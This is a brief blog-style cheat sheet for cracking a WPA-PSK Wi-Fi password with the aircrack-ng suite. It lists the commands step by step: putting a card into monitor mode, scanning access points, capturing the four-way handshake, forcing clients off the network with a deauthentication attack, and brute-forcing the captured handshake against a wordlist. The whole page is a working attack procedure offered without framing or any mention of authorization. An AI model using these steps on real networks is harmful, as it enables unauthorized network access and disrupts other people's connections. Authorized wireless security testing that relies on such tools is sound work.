WPA PSK attack

WPA PSK attack with aircrack-ng suite.

Place your wireless card into Monitor Mode

airmon-ng start wlan0

Detect all available wireless AP’s and clients

airodump-ng mon0

Setting adapter channel

iwconfig mon0 channel <channel_number>

Capturing the four-way handshake

airodump-ng --channel <channel_number> --bssid <bssid> --write capture mon0

You can capture the handshake passively (it takes time) or de-authenticate a client.

De-authentication attack

aireplay-ng --deauth 3 -a <BSSID> -c <client_mac> mon0

Brute forcing

aircrack-ng -w passwords.lst capture-01.cap

 

%d bloggers like this: